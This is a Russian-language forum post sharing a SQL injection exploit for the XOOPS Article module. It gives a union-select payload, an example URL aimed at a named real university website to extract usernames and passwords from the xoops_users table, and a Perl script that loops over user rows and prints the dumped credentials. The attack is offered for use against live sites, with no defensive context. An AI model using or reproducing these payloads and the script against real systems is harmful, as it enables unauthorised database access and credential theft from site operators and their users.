|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Solide Snake, не разу на blind не натыкался.
xoops # Article Module # sql injection
Код:
modules/articles/article.php?id={SQL}--
+xoops_users
-uname
-pass
example:
Код:
http://www.geo.pu.ru/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(0x3a,uname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0+from+xoops_users+limit+0,1--
mega exploit  :
Код:
#!usr/bin/perl
use LWP::UserAgent;
print qq(
# xoops article module exploit #
# coded by ph1l1ster #\n\n# Enter site:\n> );
$site = <STDIN>;chomp($site);
print "\n# Enter numbers of users:\n> ";
$users = <STDIN>;chomp($users);
&inj;
sub inj{
print "\nStarting..\n\n";
$limit = 0;
while ($limit <= $users){
$url = "http://".$site."/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(555666,0x3a,uname,0x3a,pass,0x3a,777888),8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users+limit+".$limit.",1--";
$client = LWP::UserAgent->new( ) or die;
$answer = $client->get($url);
$limit ++;
if ($answer->content =~ /555666:(.*):777888/){
print $1."\n";}}
print "Done!"}
|